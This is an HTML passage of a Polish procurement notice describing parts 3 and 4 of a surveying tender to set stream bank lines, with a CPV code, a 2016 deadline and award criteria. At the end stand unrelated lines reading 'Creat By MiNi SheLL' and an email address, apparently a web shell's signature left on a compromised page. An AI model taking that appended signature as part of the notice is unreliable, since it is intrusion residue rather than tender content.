orientacyjne wykazy działek mogą odbiegać od rzeczywistości w terenie, dlatego Zamawiający zaleca przede wszystkim wizję w terenie dla każdej z części oraz skalkulowanie w ofercie ewentualnych rozbieżności pomiędzy podanym orientacyjnym wykazem działek a stanem faktycznym w terenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Termin wykonania - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> III.Usługa geodezyjna polegająca na obustronnym ustaleniu linii brzegu cieku Rakówka w km 0+980-1+910 w obrębie m. Rakowice Wielkie, gm. Lwówek Śląski..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:-ustalenie linii brzegowej cieku zgodnie z art. 15 ustawy z dnia 18 lipca 2001r. Prawo wodne (tekst jednolity Dz. U. z 2015r., poz. 469 ze zm.);
-rozliczenie powierzchni powstałych w wyniku rozgraniczenia gruntów pod powierzchniową wodą płynącą od gruntów sąsiednich wraz z nadaniem 
(w razie konieczności) nowych numerów działek lub ich scalenia, dokonanie zmian sposobu użytkowania (również na starorzeczach) - ustanowienie odpowiedniego użytku,- sporządzenie wykazu zmian danych ewidencyjnych gruntów wg stanu obecnego,  uwidocznionego w ewidencji gruntów i budynków oraz stanu nowego, powstałego po rozgraniczeniu; - sporządzenie dokumentacji formalno-prawnej. Lokalizacja działek objętych zamówieniem możliwa jest do sprawdzenia na ogólnodostępnej stronie internetowej: http://geoportal.dolnyslask.pl/imap/ Za wykonanie usługi Zamawiający będzie uważał:przedstawioną kopię wniosków o ustalenie linii brzegowej cieku wraz z załączonym zawiadomieniem o zakończeniu prac z potwierdzoną datą wpływu do właściwego organu.Wnioski o ustalenie linii brzegowej powinny zostać przygotowane oddzielnie dla każdego właściciela nieruchomości. Podane przez Zamawiającego orientacyjne wykazy działek mogą odbiegać od rzeczywistości w terenie, dlatego Zamawiający zaleca przede wszystkim wizję w terenie dla każdej z części oraz skalkulowanie w ofercie ewentualnych rozbieżności pomiędzy podanym orientacyjnym wykazem działek a stanem faktycznym w terenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Termin wykonania - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> IV.Usługa geodezyjna polegająca na obustronnym ustaleniu linii brzegu cieku Bobrzyca w km 20+500-21+800 w obrębie m. Raciborowice Dolne, gm. Warta Bolesławiecka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:-ustalenie linii brzegowej cieku zgodnie z art. 15 ustawy z dnia 18 lipca 2001r. Prawo wodne (tekst jednolity Dz. U. z 2015r., poz. 469 ze zm.); -rozliczenie powierzchni powstałych w wyniku rozgraniczenia gruntów pod powierzchniową wodą płynącą od gruntów sąsiednich wraz z nadaniem (w razie konieczności) nowych numerów działek lub ich scalenia, dokonanie zmian sposobu użytkowania (również na starorzeczach) - ustanowienie odpowiedniego użytku,        - sporządzenie wykazu zmian danych ewidencyjnych gruntów wg stanu obecnego,  uwidocznionego w ewidencji gruntów i budynków oraz stanu nowego, powstałego 
po rozgraniczeniu; - sporządzenie dokumentacji formalno-prawnej. Lokalizacja działek objętych zamówieniem możliwa jest do sprawdzenia na ogólnodostępnej stronie internetowej: http://geoportal.dolnyslask.pl/imap/ Za wykonanie usługi Zamawiający będzie uważał: przedstawioną kopię wniosków o ustalenie linii brzegowej cieku wraz z załączonym zawiadomieniem o zakończeniu prac z potwierdzoną datą wpływu do właściwego organu. Wnioski o ustalenie linii brzegowej powinny zostać przygotowane oddzielnie dla każdego właściciela nieruchomości. Podane przez Zamawiającego orientacyjne wykazy działek mogą odbiegać od rzeczywistości w terenie, dlatego Zamawiający zaleca przede wszystkim wizję w terenie dla każdej z części oraz skalkulowanie w ofercie ewentualnych rozbieżności pomiędzy podanym orientacyjnym wykazem działek a stanem faktycznym w terenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Termin wykonania - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com